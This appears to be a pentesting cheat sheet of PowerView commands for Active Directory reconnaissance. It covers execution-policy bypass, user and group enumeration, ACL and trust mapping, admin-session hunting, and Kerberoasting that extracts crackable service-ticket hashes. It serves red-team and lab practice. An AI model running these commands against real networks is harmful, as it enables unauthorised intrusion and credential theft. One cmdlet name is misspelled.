powerview.ps1
powershell.exe -exec bypass; Import-Module PowerView.ps1
[OR] . .\PowerView.ps1
Domain information
Get-Domain [-Domain DOMAIN]
Get-DomainController [-Domain DOMAIN]
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."to-enumerate-further"
Domain Users & Computers
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
Get-DomainUser | select samaccountname,userprincipalname, memberof
Get-DomainUser * -Domain DOMAIN | Select-Object -Property name,samaccountname,description,memberof,admincount,userprincipalname, serviceprincipalname, useraccountcontrol
Get-UserProperty [-Properties FIELD]
Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
# live hosts
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
Kerberoastable Users
Get-NetUser -SPN | select serviceprincipalname
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
Domain Groups
# can use *admin*
Get-NetGroup [-GroupName "GROUPNAME"]
Get-NetGroupMember [-GroupName "GROUPNAME"]
SMB Shares
Invoke-ShareFinder [-CheckShareAccess]
GPO
Get-NetGPO [| select displayname]
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
ACLs
# Returns the ACLs associated with the specified account
Get-DomaiObjectAcl -Identity <AccountName> -ResolveGUIDs
#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g smb share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Domain Trusts
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>
#Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
Get-DomainTrustMapping
User Hunting
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain
Find-DomainLocalGroupMember -Verbose
#Find computers were a Domain Admin OR a spesified user has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName
#Confirming admin access
Test-AdminAccess
References
Last updated
Was this helpful?